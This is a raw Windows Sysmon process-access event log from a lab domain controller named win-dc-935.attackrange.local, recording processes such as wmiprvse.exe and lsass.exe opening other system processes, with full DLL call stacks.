13:54:45.907{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005653Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.907{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005652Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.907{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005651Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.907{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005650Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.907{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005649Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.907{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005648Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.907{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005647Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.907{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005646Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.907{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005645Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005644Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005643Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005642Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005641Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005640Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005639Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005638Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005637Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005636Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005635Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005634Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005633Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005632Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005631Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005630Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 